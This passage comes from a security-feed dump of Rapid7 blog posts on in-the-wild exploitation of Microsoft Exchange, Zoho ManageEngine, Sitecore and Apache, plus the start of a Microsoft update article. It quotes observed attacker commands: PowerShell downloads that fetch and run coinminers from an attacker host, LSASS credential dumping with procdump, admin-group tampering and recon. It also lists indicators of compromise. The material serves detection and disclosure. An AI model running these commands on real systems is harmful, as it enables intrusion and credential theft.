type \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\outlooken.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Coinminer dropper attacker\n\nSome attackers were seen using PowerShell to retrieve and execute coinminers.\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nAnd again with a slightly different filename to retrieved from:\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Simple reconnaissance attacker(s)\n\nSome attackers were seen performing extremely simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:\n \n \n net group /domain\n net group \"Domain Computers\" /do\n net group \"Domain Users\" /do\n net group IntranetAdmins /do\n net user /domain\n systeminfo\n tasklist\n \n\nAnother example where only simple recon type commands were executed:\n \n \n whoami\n systeminfo\n systeminfo\n wmic product get name\n Wmic product get name\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n## Conclusions\n\nWhile there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several different attackers with different motivations and skills. Rapid7 did even observe exploitation of the same victim by multiple different actors (HAFNIUM and coinminer drops) within a two-week timeframe. Several attackers used this vulnerability to gather passwords/hashes from victim systems en masse. This enabled them to gather data from several victims that would allow them access into various Active Directory services as long as those credentials gathered remain unchanged. \n\nThis dumping of credentials may have been done at this scale as the attackers were aware this activity would be discovered and the vulnerability would be patched very soon. This would potentially allow these attackers to continue to access these accounts even after the systems had been successfully patched. The level of escalation in use by HAFNIUM subsequent use by several other actors may point to the same exploit being shared or leaked. **At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.**\n\nBy continuing to analyze the behavior of attackers post-compromise to develop detections, it can greatly increase the likelihood to be notified of a breach. This is regardless of the method used to obtain the initial access to the victim environment. Additionally, these detections have longer lifespans and can be made available in a more timely manner than most indicators of compromise are shared in other types of public reporting.\n\n### Observed CVEs employed by attackers: \n\n\nCommon Vulnerabilities and Exposure | Description \n---|--- \nCVE-2018-18913 | Opera Search Order Hijacking Vulnerability <https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html> \nCVE-2021-26855 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855> \nCVE-2021-26857 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857> \nCVE-2021-26858 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858> \nCVE-2021-27065 | Microsoft Exchange Server remote code execution <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \n \n### Observed IOCs employed by all attackers:\n\nType | Value \n---|--- \nFQDN | estonine.com \nFQDN | p.estonine.com \nFQDN | ipinfo.io \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\ \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\ \nFilepath | c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\ \nFilepath | C:\\Programdata\\ \nFilepath | C:\\ProgramData\\COM\\zfwqn\\ \nFilepath | C:\\root\\ \nFilepath | C:\\Users\\Public\\ \nFilepath | C:\\Users\\Public\\Opera\\ \nFilepath | C:\\Windows\\temp\\ \nFilename | 1.txt \nFilename | 2.bat \nFilename | 3.avi \nFilename | b.log \nFilename | c103w-at.zip \nFilename | client32.exe \nFilename | code \nFilename | curl.exe \nFilename | demo.dll \nFilename | discover.aspx \nFilename | dsf.exe \nFilename | error.aspx \nFilename | ErrorFF.aspx \nFilename | exshell.psc1 \nFilename | Flogon.aspx \nFilename | lsass.dump \nFilename | m103w.zip \nFilename | nvidia.msi \nFilename | opera_browser.dll \nFilename | opera_browser.exe \nFilename | opera_browser.png \nFilename | OutlookEN.aspx \nFilename | MonitoringLog.cmd \nFilename | MonitoringLog.exe \nFilename | p \nFilename | procdump64.exe \nFilename | Service.Information.rtf \nFilename | TimeoutLogout.aspx \nFilename | 2.bat \nFilename | script1.ps1 \nFilename | test.bat \nIP Address | 178.162.217.107 \nIP Address | 178.162.203.202 \nIP Address | 178.162.203.226 \nIP Address | 85.17.31.122 \nIP Address | 5.79.71.205 \nIP Address | 5.79.71.225 \nIP Address | 178.162.203.211 \nIP Address | 85.17.31.82 \nIP Address | 86.105.18.116 \nIP Address | 198.98.61.152 \nIP Address | 89.34.111.11 \nMD5 | 7a6c605af4b85954f62f35d648d532bf \nMD5 | e1ae154461096adb5ec602faad42b72e \nMD5 | b3df7f5a9e36f01d0eb0043b698a6c06 \nMD5 | c60ac6a6e6e582ab0ecb1fdbd607705b \nMD5 | 42badc1d2f03a8b1e4875740d3d49336 \nMD5 | c515107d75563890020e915f54f3e036 \nSHA1 | 02886f9daa13f7d9855855048c54f1d6b1231b0a \nSHA1 | c7f68a184df65e72c59403fb135924334f8c0ebd \nSHA1 | ab32d4ec424b7cd30c7ace1dad859df1a65aa50e \nSHA1 | ba9de479beb82fd97bbdfbc04ef22e08224724ba \nSHA1 | cee178da1fb05f99af7a3547093122893bd1eb46 \nSHA1 | 2fed891610b9a770e396ced4ef3b0b6c55177305 \nSHA-256 | b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff \nSHA-256 | d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09 \nSHA-256 | bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6 \nSHA-256 | 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87 \nSHA-256 | c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf \nSHA-256 | 076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26 \nURL | `http://103.212.223.210:9900/nvidia.msi` \nURL | `http://86.105.18.116/news/code` \nURL | `http://86.105.18.116/news/opera_browser.dll` \nURL | `http://86.105.18.116/news/opera_browser.exe` \nURL | `http://86.105.18.116/news/opera_browser.png` \nURL | ` http://89.34.111.11/3.avi` \nURL | `http://microsoftsoftwaredownload.com:8080/c103w-at.zip` \nURL | `http://microsoftsoftwaredownload.com:8080/m103w.zip` \nURL | `http://p.estonine.com/p?e` \nURL | http://<REDACTED_HOSTNAME>/owa/auth/ /zfwqn \nURL | http://<REDACTED_HOSTNAME>/owa/auth/%20/zfwqn \n \n### References:\n\n * <https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>\n * <https://aka.ms/ExchangeVulns>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>\n * <https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-03-23T14:04:36", "type": "rapid7blog", "title": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-18913", "CVE-2019-19781", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-23T14:04:36", "id": "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "href": "https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nStarting February 27, 2021, Rapid7 has observed a notable increase in the exploitation of Microsoft Exchange through existing detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s Attacker Behavior Analytics (ABA). The Managed Detection and Response (MDR) identified multiple, related compromises in the past 72 hours. In most cases, the attacker is uploading an \u201ceval\u201d webshell, commonly referred to as a \u201cchopper\u201d or \u201cChina chopper\u201d. With this foothold, the attacker would then upload and execute tools, often for the purpose of stealing credentials. Further investigative efforts have identified overlap in attacker techniques and infrastructure.\n\n## **Summary**\n\nAt close to midnight UTC on February 27, 2021, Managed Detection and Response SOC analysts began observing alerts for the following ABA detections in InsightIDR:\n\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\nUpon further inspection of [Enhanced Endpoint Telemetry](<https://blog.rapid7.com/2020/10/15/introducing-enhanced-endpoint-telemetry-eet-in-insightidr/>) data produced by InsightAgent, Rapid7 analysts identified that attackers had successfully compromised several systems and noted that they were all on-premise Microsoft Exchange servers with web services accessible to the public Internet. Exposing web services to the public internet is a common practice for customers with on-premise instances of Microsoft Exchange to provide their users with email services over the web through Outlook Web Access (OWA). \n\nUsing Project Sonar, Rapid7's Labs team was able to identify how target-rich an environment attackers have to work with: Nearly 170,000 servers vulnerable to a different recent Exchange CVE (for which [proof-of-concept exploit code](<https://github.com/sourceincite/CVE-2021-24085>) is readily available) were exposed to the public internet. \n\n\n\nWith the compromise identified, our team of Customer Advisors alerted our customers to this activity. Meanwhile, our analysts quickly began performing deeper inspection of the logs uploaded to InsightIDR along with collecting additional forensic information directly from the compromised endpoints. Within a very short period of time, our analysts were able to identify how the attackers were executing commands, where they were coming from, and what tools they were using. This information allowed Rapid7 to provide proactive, actionable steps to our customers to thwart the attack . Additionally, our analysts worked jointly with our Threat Intelligence and Detection Engineering (TIDE) team to review the collected data for the purpose of immediately developing and deploying additional detections for customers.\n\nThree days later, on March 2, 2021, Microsoft acknowledged and [released information](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on the exploitation of 0-day vulnerabilities in Microsoft Exchange by an actor they refer to as \"hafnium.\" They also released patches for Microsoft Exchange 2013, 2016 and 2019 ([CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>), as well as others).\n\nDespite this vulnerability being unknown to the public, Rapid7 was able to identify the attacker's presence on systems to help defend against the use of these 0-day exploits with our Attacker Behavior Analytics library.\n\n**Rapid7 recommends that everyone running Microsoft Exchange apply these patches immediately as they are being exploited in the wild by a sophisticated adversary.**\n\n## **Technical Analysis of Attacker Activity**\n\n 1. Automated scanning to discover vulnerable Exchange servers from the following DigitalOcean IP addresses:\n * 165.232.154.116\n * 157.230.221.198\n * 161.35.45.41\n\n2\\. Analysis of Internet Information Services (IIS) logs shows a POST request is then made from the scanning DigitalOcean IP to multiple paths and files:\n\n * /ecp/y.js\n * /rpc/\n * /owa/auth/signon.aspx\n * /aspnet_client/system_web/<random_name>.aspx\n * IIS Path ex: /aspnet_client/system_web/TInpB9PE.aspx\n * File system path ex: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\TInpB9PE.aspx\n * /aspnet_client/aspnet_iisstart.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_iisstart.aspx\n * /aspnet_client/aspx_client.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_client.aspx\n * /aspnet_client/aspnet.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspnet.aspx\n\nIn some cases, additional dynamic link libraries (DLLs) and compiled aspx files are created shortly after the webshells are first interacted with via POST requests in the following locations:\n\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\root\\\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\owa\\\n\n3\\. Next, a command executes, attempting to delete the \u201cAdministrator\u201d from the \u201cExchange Organization administrators\u201d group:\n\n * cmd /c cd /d C:\\\\\\inetpub\\\\\\wwwroot\\\\\\aspnet_client\\\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n\n4\\. With the command executed, and the webshell successfully uploaded, interaction with the webshell will begin from a different IP. \n\n * We have monitored interaction from 45.77.252[.]175\n\n5\\. Following the POST request, multiple commands are executed on the asset:\n\na. Lsass.exe dumping using procdump64.exe and C:\\Temp\\update.exe \n(MD5:[ f557a178550733c229f1087f2396f782](<https://www.virustotal.com/gui/file/173ac2a1f99fe616f5efa3a7cf72013ab42a68f7305e24ed795a98cb08046ee1/detection>)):\n\n * cmd /c cd /d C:\\\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n\nb. Reconnaissance commands:\n\n * whoami.exe\n * ping.exe\n * tasklist.exe\n * quser.exe\n * query.exe\n\n****Indicators Of Compromise (IOCs)****\n\nType | Value \n---|--- \nIP Address | 165.232.154.116 \nIP Address | 157.230.221.198 \nIP Address | 161.35.45.41 \nIP Address | 45.77.252.175 \nIP Address | 104.248.49[.]97 \nIP Address That Interacts with Uploaded Webshells | 194.87.69[.]35 \nURL | /ecp/y.js \nURL | /ecp/DDI/DDIService.svc/GetList \nURL | /ecp/DDI/DDIService.svc/SetObject \nURL | /owa/auth/errorEE.aspx \nURL | /owa/auth/logon.aspx \nURL | /owa/auth/errorFE.aspx \nURL | /aspnet_client/aa.aspx \nURL | /aspnet_client/iis \nURL | /iistart.aaa \nURL | /owa/iistart.aaa \nUser Agent | python-requests/2.25.1 \nUser Agent | antSword/v2.1 \n \n## **References**\n\n * <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>\n * <https://github.com/microsoft/CSS-Exchange/tree/main/Security>\n\n## Update: March 7, 2021\n\nMicrosoft [published tools](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) to help identify servers potentially compromised by [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). Upon review of the checks within the tools, Rapid7 identified the following additional pre-existing detections within InsightIDR\u2019s Attacker Behavior Analytics that would have alerted customers to this malicious actor in their environment:\n\n * Attacker Technique - PowerShell New-MailboxExportRequest (Created March 14, 2019)\n * Attacker Technique - PowerShell Remove-MailboxExportRequest (Created Dec. 15, 2020)\n * Attacker Technique - Compressing Mailbox With 7zip (Created Dec. 15, 2020)\n * Attacker Technique - PowerShell Download Cradles (Created Jan. 3, 2019)\n\nThese previously existing detections are based on observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response, and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration across the Detection and Response practice, we help ensure our clients continue to have coverage for the latest techniques being used by malicious actors.\n\n## Update March 18, 2021\n\nWidespread [exploitation of vulnerable on-premises Exchange servers](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) is ongoing. Microsoft has released a \"One-Click Exchange On-premises Mitigation Tool\" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended \"to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\" They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n_We'd like to extend a huge thank-you to everyone who helped contribute to this blog post: _\n\n * _Robert Knapp_\n * _Shazan Khaja_\n * _Lih Wern Wong _\n * _Tiffany Anders _\n * _Andrew Iwamaye _\n * _Rashmi Joshi_\n * _Daniel Lydon_\n * _Dan Kelly_\n * _Carlo Anez Mazurco_\n * _Eoin Miller_\n * _Charlie Stafford_\n * _The Rapid7 MVM Team_", "cvss3": {}, "published": "2021-03-03T00:41:04", "type": "rapid7blog", "title": "Rapid7\u2019s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T00:41:04", "id": "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "href": "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T09:08:01", "description": "\n\nOver the weekend of November 6, 2021, Rapid7\u2019s Incident Response (IR) and Managed Detection and Response (MDR) teams began seeing opportunistic exploitation of two unrelated CVEs:\n\n * CVE-2021-40539, a REST API authentication bypass in Zoho\u2019s ManageEngine ADSelfService Plus product that [Rapid7 has previously analyzed](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>). CISA [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) of attackers targeting CVE-2021-40539 in September; the vulnerability allows for unauthenticated remote code execution upon successful exploitation. As of November 8, 2021, Microsoft is [also warning](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) that a specific threat actor is targeting vulnerable ManageEngine ADSelfService Plus installations.\n * CVE-2021-42237, a [deserialization vulnerability](<https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=blog>) in the Sitecore Experience Platform that allows for unauthenticated remote code execution [in earlier versions](<https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776>). The affected versions of Sitecore XP appear to be several years old and unsupported other than through extended support contracts. With that said, there seem to be a higher number of organizations with vulnerable installations than expected based on the rate of compromise Rapid7 teams have observed.\n\nAttackers appear to be targeting vulnerabilities with attacks that drop webshells and install coin miners on vulnerable targets. The majority of the compromises Rapid7\u2019s services teams have seen are the result of vulnerable Sitecore instances. Both CVEs are patched; ManageEngine ADSelfService Plus and Sitecore XP customers should prioritize fixes on an urgent basis, without waiting for regularly scheduled patch cycles.\n\n## Rapid7 customers\n\nThe following attacker behavior detections are available to InsightIDR and MDR customers and will alert security teams to webshells and powershell activity related to this attack:\n\n * Webshell - IIS Spawns CMD to Spawn PowerShell\n * Attacker Technique - PowerShell Download Cradle\n\nInsightVM and Nexpose customers can assess their exposure to Zoho ManageEngine CVE-2021-40539 with a [remote vulnerability check](<https://www.rapid7.com/db/vulnerabilities/zoho-manageengine-adselfservice-plus-cve-2021-40539/>). Rapid7 vulnerability researchers have a full technical analysis of this vulnerability [available here](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>). Our research teams are investigating the feasibility of adding a vulnerability check for Sitecore XP CVE-2021-42237. A technical analysis of this vulnerability is [available here](<https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=blog>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-11-09T16:59:41", "type": "rapid7blog", "title": "Opportunistic Exploitation of Zoho ManageEngine and Sitecore CVEs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40539", "CVE-2021-42237"], "modified": "2021-11-09T16:59:41", "id": "RAPID7BLOG:D84509B01151F59E9152A401D5CF206D", "href": "https://blog.rapid7.com/2021/11/09/opportunistic-exploitation-of-zoho-manageengine-and-sitecore-cves/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T08:58:36", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-41773, CVE-2021-42013 | [Apache Advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) | [AttackerKB](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) | Available | ASAP | October 12, 2021 15:00 ET \n \n\n\n_See the `Updates` section at the end of this post for information on developments that occurred after initial publication._\n\nOn Monday, October 4, 2021, Apache published [an advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) on [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>), an unauthenticated remote file disclosure vulnerability in HTTP Server version 2.4.49 and 2.4.50 (see the `Updates` section for more on 2.4.50). The vulnerability arises from the mishandling of URL-encoded path traversal characters in the HTTP GET request. Public proof-of-concept exploit code is widely available, and Apache and others have noted that this vulnerability is being exploited in the wild. Note that a non-default configuration is required for exploitability.\n\nWhile the original advisory indicated that CVE-2021-41773 was merely an information disclosure bug, both [Rapid7](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) and [community](<https://twitter.com/hackerfantastic/status/1445529822071967745>) researchers have verified that the vulnerability can be used for remote code execution **when [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) is enabled.** While mod_cgi is not enabled in the default Apache Server HTTP configuration, it\u2019s also not an uncommon feature to enable. With mod_cgi enabled, an attacker can execute arbitrary programs via HTTP POST requests. The initial RCE proof of concept resulted in blind command execution, and there have been multiple proofs of concept that coerce the HTTP server into sending the program\u2019s output back to the attacker. Rapid7\u2019s research team has a [full root cause analysis of CVE-2021-41773 here](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) along with proofs of concept.\n\nRapid7 Labs has identified roughly 65,000 potentially vulnerable versions of Apache httpd exposed to the public internet. Our exposure estimate intentionally does not count multiple Apache servers on the same IP as different instances (this would substantially increase the number of exposed instances identified as vulnerable).\n\n\n\n## Mitigation guidance\n\nOrganizations that are using Apache HTTP Server 2.4.49 or 2.4.50 should determine whether they are using vulnerable configurations. If a vulnerable server is discovered, the server\u2019s configuration file should be updated to include the filesystem directory directive with _require all denied_:\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\nApache HTTP Server users should update to **2.4.51** or later as soon as is practical. Updating to HTTP Server 2.4.51 remediates both CVE-2021-41773 and CVE-2021-42013. For more information, see [Apache\u2019s advisory here](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\n## Rapid7 customers\n\nA remote vulnerability check for CVE-2021-41773 was released to InsightVM and Nexpose customers in the October 6, 2021 content update.\n\nA remote vulnerability check for CVE-2021-42013 was released to InsightVM and Nexpose customers in the October 7, 2021 content update.\n\n## Updates\n\n**October 7, 2021:** Apache has updated their advisory to note that the patch for CVE-2021-41773 was incomplete, rendering HTTP Server 2.4.50 versions vulnerable when specific, non-default conditions are met. According to their advisory, "an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration _require all denied_, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution."\n\nCVE-2021-42013 has been assigned to track the incomplete fix for CVE-2021-41773. CVE-2021-42013 has been fixed in HTTP Server version 2.4.51 released October 7, 2021. For more information, [see Apache's advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-10-06T16:42:32", "type": "rapid7blog", "title": "Apache HTTP Server CVE-2021-41773 Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-06T16:42:32", "id": "RAPID7BLOG:9C7E6BE350F06790928CFF68E04A6ECE", "href": "https://blog.rapid7.com/2021/10/06/apache-http-server-cve-2021-41773-exploited-in-the-wild/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2023-06-23T19:31:29", "description": "None\n**Latest Update 3/16/2021 PST (this will be the final update)**This security update rollup resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2021-26412 Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26412>)\n * [CVE-2021-27078 Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27078>)\n * [CVE-2021-26854 Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26854>)\n * [CVE-2021-26855 Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)\n * [CVE-2021-27065 Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)\n * [CVE-2021-26857 Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>)\n * [CVE-2021-26858 Microsoft Exchange Server Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>)\n\n## Known issues in this update\n\n * When you try to manually install this security update by double-clicking the update file (.msp) to run it in normal mode (that is, not as an administrator), some files are not correctly updated.When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook on the web and the Exchange Control Panel (ECP) might stop working. \n \nThis issue occurs on servers that are using User Account Control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.To avoid this issue, follow these steps to manually install this security update.\n\n**Note: **This issue does not occur if you install the update through Microsoft Update.\n\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\n**Notes: **\n\n * Exchange services might remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition might occur if the service control scripts experience a problem when they try to return Exchange services to their usual state. \n \nTo fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\\(v=ws.10\\).aspx>).\n * When you block third-party cookies in a web browser, you may be continually prompted to trust a particular add-in even though you keep selecting the option to trust it. This issue occurs also in privacy window modes (such as InPrivate mode in Microsoft Edge). This issue occurs because browser restrictions prevent the response from being recorded. To record the response and enable the add-in, you must enable third-party cookies for the domain that's hosting OWA or Office Online Server in the browser settings. To enable this setting, refer to the specific support documentation for the browser.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5000871>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.**Version Updated on 3/2/2021 PST**\n\n * [Download Security Update For Exchange Server 2019 Cumulative Update 8 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=18c75641-e53d-4979-8d5e-29a80674e41f>)\n * [Download Security Update For Exchange Server 2019 Cumulative Update 7 (KB5000871)](<https://www.microsoft.com/download/details.aspx?familyid=2aadda14-b8aa-4370-a492-0a6818facce8>)\n * [Download Security Update For Exchange Server 